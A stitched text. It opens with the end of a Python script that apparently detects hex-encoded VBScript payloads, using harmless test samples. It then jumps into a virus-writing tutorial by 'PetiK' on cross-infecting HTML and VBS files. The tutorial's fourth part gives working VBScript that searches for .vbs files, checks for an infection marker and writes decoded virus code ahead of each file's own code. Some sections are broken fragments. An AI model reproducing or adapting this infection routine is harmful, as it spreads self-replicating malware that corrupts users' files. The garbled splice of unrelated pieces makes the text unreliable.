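e = e + "4F6E204572726F7220526573756D65204E6578740D0A"
e = e + "4D7367426F78202248656C6C6F220D0A"
read=dec(e)
End Sub

Function dec(octe)
For hexad = 1 To Len(octe) Step 2
dec = dec & Chr("&h" & Mid(octe, hexad, 2))
Next
End Function
'''

# Constructed HTML carrier holding only the second chunk.
SAMPLE_HTML = '''<SCRIPT LANGUAGE=VBSCRIPT>
vbshex="4D7367426F78202248656C6C6F220D0A"
For Y=1 To Len(vbshex) Step 2
virvbs = virvbs & Chr("&H" & Mid(vbshex,Y,2))
Next
</SCRIPT>
'''

if __name__ == "__main__":
    for label, sample in (("module", SAMPLE_MODULE), ("html", SAMPLE_HTML)):
        report = analyse(sample)
        print(label, report["hex_chunks"], report["has_decoder"], repr(report["payload"]))
```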
#####################
# III: HTML -> HTML #
#####################
It's a simple routine. Like in VBS (and it's in VBS).
End If
Next
End If
End Function
</script></body></html>
Really simple, no ??
###################
# IV: HTML -> VBS #
###################
So this is the last part.
Look at the second part, where I wrote
...... NO FINISH, SEE THE fourth chapter ' Here the infection HTML -> VBS
Here we must search for the VBS files, the same way that we infect HTM/HTML files.
In the HTML virus we have :
If ext="htm" or ext="html" Then
So we add
ElseIf ext="vbs" Then
Set cot = fso.OpenTextFile(f1.Path, 1, False)
If cot.ReadLine <> "'mark" Then ' check is already infected
cot.Close
Set cot = fso.OpenTextFile(f1.Path, 1, False)
vbsorg = cot.ReadAll()
cot.Close
----------- here we infect the VBS file -----------
For Y=1 To Len(vbshex) Step 2
virvbs = virvbs & Chr("&H" & Mid(vbshex,Y,2))
Next
Set inf = fso.OpenTextFile(f1.Path, 2, True)
inf.Write virvbs ' write virus code
inf.WriteLine ""
inf.WriteLine (vbsorg) ' write real code
inf.Close
----------- here we infect the VBS file -----------
End If
###################
# V: CONCLUSION : #
###################
This is the end of the article. If you have some suggestions or new ideas, please mail me to
petikvx@aol.fr.
PetiK/[b8] (www.petikvx.fr.fm)